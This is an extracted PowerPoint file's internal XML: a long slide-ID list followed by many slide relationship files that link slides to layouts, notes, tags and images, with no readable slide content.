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258" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="285" r:id="rId8"/>
    <p:sldId id="286" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="1898" r:id="rId11"/>
    <p:sldId id="314" r:id="rId12"/>
    <p:sldId id="315" r:id="rId13"/>
    <p:sldId id="322" r:id="rId15"/>
    <p:sldId id="323" r:id="rId16"/>
    <p:sldId id="325" r:id="rId17"/>
    <p:sldId id="326" r:id="rId18"/>
    <p:sldId id="327" r:id="rId19"/>
    <p:sldId id="1042" r:id="rId20"/>
    <p:sldId id="328" r:id="rId21"/>
    <p:sldId id="330" r:id="rId22"/>
    <p:sldId id="1229" r:id="rId23"/>
    <p:sldId id="331" r:id="rId24"/>
    <p:sldId id="332" r:id="rId25"/>
    <p:sldId id="333" r:id="rId26"/>
    <p:sldId id="334" r:id="rId27"/>
    <p:sldId id="335" r:id="rId28"/>
    <p:sldId id="336" r:id="rId29"/>
    <p:sldId id="337" r:id="rId30"/>
    <p:sldId id="338" r:id="rId31"/>
    <p:sldId id="1230" r:id="rId32"/>
    <p:sldId id="503" r:id="rId33"/>
    <p:sldId id="504" r:id="rId34"/>
    <p:sldId id="505" r:id="rId35"/>
    <p:sldId id="339" r:id="rId36"/>
    <p:sldId id="1231" r:id="rId37"/>
    <p:sldId id="341" r:id="rId38"/>
    <p:sldId id="344" r:id="rId39"/>
    <p:sldId id="1416" r:id="rId40"/>
    <p:sldId id="345" r:id="rId41"/>
    <p:sldId id="1415" r:id="rId42"/>
    <p:sldId id="346" r:id="rId43"/>
    <p:sldId id="1587" r:id="rId44"/>
    <p:sldId id="347" r:id="rId45"/>
    <p:sldId id="349" r:id="rId46"/>
    <p:sldId id="350" r:id="rId47"/>
    <p:sldId id="342" r:id="rId48"/>
    <p:sldId id="317" r:id="rId49"/>
    <p:sldId id="881" r:id="rId50"/>
    <p:sldId id="318" r:id="rId51"/>
    <p:sldId id="319" r:id="rId52"/>
    <p:sldId id="358" r:id="rId53"/>
    <p:sldId id="415" r:id="rId54"/>
    <p:sldId id="372" r:id="rId55"/>
    <p:sldId id="373" r:id="rId56"/>
    <p:sldId id="3208" r:id="rId57"/>
    <p:sldId id="3039" r:id="rId58"/>
    <p:sldId id="1899" r:id="rId59"/>
    <p:sldId id="374" r:id="rId60"/>
    <p:sldId id="417" r:id="rId61"/>
    <p:sldId id="3380" r:id="rId62"/>
    <p:sldId id="2371" r:id="rId63"/>
    <p:sldId id="420" r:id="rId64"/>
    <p:sldId id="419" r:id="rId65"/>
    <p:sldId id="2683" r:id="rId66"/>
    <p:sldId id="2684" r:id="rId67"/>
    <p:sldId id="4041" r:id="rId68"/>
    <p:sldId id="4603" r:id="rId69"/>
    <p:sldId id="4415" r:id="rId70"/>
    <p:sldId id="4416" r:id="rId71"/>
    <p:sldId id="4228" r:id="rId72"/>
    <p:sldId id="421" r:id="rId73"/>
    <p:sldId id="1754" r:id="rId74"/>
    <p:sldId id="1755" r:id="rId75"/>
    <p:sldId id="424" r:id="rId76"/>
    <p:sldId id="1756" r:id="rId77"/>
    <p:sldId id="425" r:id="rId78"/>
    <p:sldId id="426" r:id="rId79"/>
    <p:sldId id="3382" r:id="rId80"/>
    <p:sldId id="3384" r:id="rId81"/>
    <p:sldId id="3385" r:id="rId82"/>
    <p:sldId id="3386" r:id="rId83"/>
    <p:sldId id="3387" r:id="rId84"/>
    <p:sldId id="3388" r:id="rId85"/>
    <p:sldId id="3389" r:id="rId86"/>
    <p:sldId id="3390" r:id="rId87"/>
    <p:sldId id="3391" r:id="rId88"/>
    <p:sldId id="431" r:id="rId89"/>
    <p:sldId id="2373" r:id="rId90"/>
    <p:sldId id="2374" r:id="rId91"/>
    <p:sldId id="2375" r:id="rId92"/>
    <p:sldId id="3393" r:id="rId93"/>
    <p:sldId id="390" r:id="rId94"/>
    <p:sldId id="392" r:id="rId95"/>
    <p:sldId id="882" r:id="rId96"/>
    <p:sldId id="393" r:id="rId97"/>
    <p:sldId id="320" r:id="rId98"/>
    <p:sldId id="359" r:id="rId99"/>
    <p:sldId id="375" r:id="rId100"/>
    <p:sldId id="433" r:id="rId101"/>
    <p:sldId id="376" r:id="rId102"/>
    <p:sldId id="434" r:id="rId103"/>
    <p:sldId id="3209" r:id="rId104"/>
    <p:sldId id="377" r:id="rId105"/>
    <p:sldId id="1900" r:id="rId106"/>
    <p:sldId id="435" r:id="rId107"/>
    <p:sldId id="3552" r:id="rId108"/>
    <p:sldId id="436" r:id="rId109"/>
    <p:sldId id="437" r:id="rId110"/>
    <p:sldId id="438" r:id="rId111"/>
    <p:sldId id="1901" r:id="rId112"/>
    <p:sldId id="1902" r:id="rId113"/>
    <p:sldId id="1903" r:id="rId114"/>
    <p:sldId id="440" r:id="rId115"/>
    <p:sldId id="1904" r:id="rId116"/>
    <p:sldId id="1905" r:id="rId117"/>
    <p:sldId id="3682" r:id="rId118"/>
    <p:sldId id="1906" r:id="rId119"/>
    <p:sldId id="621" r:id="rId120"/>
    <p:sldId id="3683" r:id="rId121"/>
    <p:sldId id="3684" r:id="rId122"/>
    <p:sldId id="3686" r:id="rId123"/>
    <p:sldId id="3685" r:id="rId124"/>
    <p:sldId id="1907" r:id="rId125"/>
    <p:sldId id="394" r:id="rId126"/>
    <p:sldId id="396" r:id="rId127"/>
    <p:sldId id="883" r:id="rId128"/>
    <p:sldId id="397" r:id="rId129"/>
    <p:sldId id="364" r:id="rId130"/>
    <p:sldId id="360" r:id="rId131"/>
    <p:sldId id="378" r:id="rId132"/>
    <p:sldId id="442" r:id="rId133"/>
    <p:sldId id="379" r:id="rId134"/>
    <p:sldId id="3210" r:id="rId135"/>
    <p:sldId id="380" r:id="rId136"/>
    <p:sldId id="2095" r:id="rId137"/>
    <p:sldId id="497" r:id="rId138"/>
    <p:sldId id="2098" r:id="rId139"/>
    <p:sldId id="2096" r:id="rId140"/>
    <p:sldId id="2099" r:id="rId141"/>
    <p:sldId id="2100" r:id="rId142"/>
    <p:sldId id="3807" r:id="rId143"/>
    <p:sldId id="2101" r:id="rId144"/>
    <p:sldId id="3808" r:id="rId145"/>
    <p:sldId id="3809" r:id="rId146"/>
    <p:sldId id="3810" r:id="rId147"/>
    <p:sldId id="511" r:id="rId148"/>
    <p:sldId id="2104" r:id="rId149"/>
    <p:sldId id="3812" r:id="rId150"/>
    <p:sldId id="3813" r:id="rId151"/>
    <p:sldId id="2102" r:id="rId152"/>
    <p:sldId id="2105" r:id="rId153"/>
    <p:sldId id="2103" r:id="rId154"/>
    <p:sldId id="398" r:id="rId155"/>
    <p:sldId id="400" r:id="rId156"/>
    <p:sldId id="884" r:id="rId157"/>
    <p:sldId id="401" r:id="rId158"/>
    <p:sldId id="365" r:id="rId159"/>
    <p:sldId id="361" r:id="rId160"/>
    <p:sldId id="381" r:id="rId161"/>
    <p:sldId id="443" r:id="rId162"/>
    <p:sldId id="382" r:id="rId163"/>
    <p:sldId id="383" r:id="rId164"/>
    <p:sldId id="2106" r:id="rId165"/>
    <p:sldId id="624" r:id="rId166"/>
    <p:sldId id="2107" r:id="rId167"/>
    <p:sldId id="2108" r:id="rId168"/>
    <p:sldId id="2109" r:id="rId169"/>
    <p:sldId id="2111" r:id="rId170"/>
    <p:sldId id="2961" r:id="rId171"/>
    <p:sldId id="2112" r:id="rId172"/>
    <p:sldId id="630" r:id="rId173"/>
    <p:sldId id="2113" r:id="rId174"/>
    <p:sldId id="2114" r:id="rId175"/>
    <p:sldId id="2962" r:id="rId176"/>
    <p:sldId id="2115" r:id="rId177"/>
    <p:sldId id="2963" r:id="rId178"/>
    <p:sldId id="402" r:id="rId179"/>
    <p:sldId id="404" r:id="rId180"/>
    <p:sldId id="885" r:id="rId181"/>
    <p:sldId id="405" r:id="rId182"/>
    <p:sldId id="366" r:id="rId183"/>
    <p:sldId id="362" r:id="rId184"/>
    <p:sldId id="384" r:id="rId185"/>
    <p:sldId id="444" r:id="rId186"/>
    <p:sldId id="385" r:id="rId187"/>
    <p:sldId id="2898" r:id="rId188"/>
    <p:sldId id="637" r:id="rId189"/>
    <p:sldId id="2117" r:id="rId190"/>
    <p:sldId id="2116" r:id="rId191"/>
    <p:sldId id="2882" r:id="rId192"/>
    <p:sldId id="2234" r:id="rId193"/>
    <p:sldId id="2232" r:id="rId194"/>
    <p:sldId id="640" r:id="rId195"/>
    <p:sldId id="2838" r:id="rId196"/>
    <p:sldId id="2839" r:id="rId197"/>
    <p:sldId id="2883" r:id="rId198"/>
    <p:sldId id="2884" r:id="rId199"/>
    <p:sldId id="2885" r:id="rId200"/>
    <p:sldId id="2886" r:id="rId201"/>
    <p:sldId id="2887" r:id="rId202"/>
    <p:sldId id="2330" r:id="rId203"/>
    <p:sldId id="2888" r:id="rId204"/>
    <p:sldId id="2329" r:id="rId205"/>
    <p:sldId id="2889" r:id="rId206"/>
    <p:sldId id="2890" r:id="rId207"/>
    <p:sldId id="2891" r:id="rId208"/>
    <p:sldId id="2332" r:id="rId209"/>
    <p:sldId id="2334" r:id="rId210"/>
    <p:sldId id="2336" r:id="rId211"/>
    <p:sldId id="2335" r:id="rId212"/>
    <p:sldId id="2892" r:id="rId213"/>
    <p:sldId id="2893" r:id="rId214"/>
    <p:sldId id="2338" r:id="rId215"/>
    <p:sldId id="2337" r:id="rId216"/>
    <p:sldId id="2895" r:id="rId217"/>
    <p:sldId id="2896" r:id="rId218"/>
    <p:sldId id="2897" r:id="rId219"/>
    <p:sldId id="406" r:id="rId220"/>
    <p:sldId id="408" r:id="rId221"/>
    <p:sldId id="886" r:id="rId222"/>
    <p:sldId id="409" r:id="rId223"/>
    <p:sldId id="367" r:id="rId224"/>
    <p:sldId id="363" r:id="rId225"/>
    <p:sldId id="387" r:id="rId226"/>
    <p:sldId id="445" r:id="rId227"/>
    <p:sldId id="2660" r:id="rId228"/>
    <p:sldId id="3940" r:id="rId229"/>
    <p:sldId id="389" r:id="rId230"/>
    <p:sldId id="2118" r:id="rId231"/>
    <p:sldId id="2194" r:id="rId232"/>
    <p:sldId id="2213" r:id="rId233"/>
    <p:sldId id="2214" r:id="rId234"/>
    <p:sldId id="4018" r:id="rId235"/>
    <p:sldId id="3913" r:id="rId236"/>
    <p:sldId id="2216" r:id="rId237"/>
    <p:sldId id="4021" r:id="rId238"/>
    <p:sldId id="4020" r:id="rId239"/>
    <p:sldId id="4022" r:id="rId240"/>
    <p:sldId id="4023" r:id="rId241"/>
    <p:sldId id="4024" r:id="rId242"/>
    <p:sldId id="758" r:id="rId243"/>
    <p:sldId id="2219" r:id="rId244"/>
    <p:sldId id="3929" r:id="rId245"/>
    <p:sldId id="3963" r:id="rId246"/>
    <p:sldId id="4025" r:id="rId247"/>
    <p:sldId id="2221" r:id="rId248"/>
    <p:sldId id="2222" r:id="rId249"/>
    <p:sldId id="2223" r:id="rId250"/>
    <p:sldId id="2831" r:id="rId251"/>
    <p:sldId id="2224" r:id="rId252"/>
    <p:sldId id="410" r:id="rId253"/>
    <p:sldId id="412" r:id="rId254"/>
    <p:sldId id="887" r:id="rId255"/>
    <p:sldId id="413" r:id="rId256"/>
    <p:sldId id="282" r:id="rId257"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7103745" cy="10234295"/>
  <p:custDataLst>
    <p:tags r:id="rId2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userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="370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h"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50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="-396" y="-1758"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2190"/>
        <p:guide pos="3704"/>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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1346.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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notesMaster" Target="notesMasters/notesMaster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7-28T21:03:28.195"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s>
</file>

<file path=ppt/slides/_rels/slide10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104.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s>
</file>

<file path=ppt/slides/_rels/slide105.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><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106.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1.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image" Target="../media/image69.png"/><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107.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tags" Target="../tags/tag521.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide39.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag515.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide108.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><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109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide41.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag53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39.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><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10.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide43.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><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tags" Target="../tags/tag540.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide44.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag551.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide113.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide45.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide114.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide115.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><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tags" Target="../tags/tag565.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag564.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide116.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide117.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag581.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide50.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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119.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag593.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag592.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag591.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag590.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag589.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag588.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide51.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag587.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media/image6.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20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide52.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><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121.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide53.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide122.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag611.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag610.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag609.xml"/><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s>
</file>

<file path=ppt/slides/_rels/slide1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s>
</file>

<file path=ppt/slides/_rels/slide125.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag621.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag644.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag635.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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s>
</file>

<file path=ppt/slides/_rels/slide1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image" Target="../media/image1.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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s>
</file>

<file path=ppt/slides/_rels/slide1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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag662.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide134.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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13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87.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag672.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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88.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide13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89.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag684.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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0.png"/><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1.png"/><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5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><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4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2.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide14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3.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag709.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag708.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag719.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag718.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag717.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag716.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag715.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag714.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide143.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag726.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag725.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag724.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag723.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag722.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag721.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag720.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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97.png"/><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tags" Target="../tags/tag729.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag728.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag727.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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38.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><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tags" Target="../tags/tag733.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide146.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag745.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag739.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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1.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide14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2.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide14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63.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag762.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag761.xml"/><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image" Target="../media/image9.png"/><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5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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag769.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag768.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag767.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag766.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag765.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag764.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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75.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide1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79.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag778.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag777.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag776.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag781.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag780.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide154.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
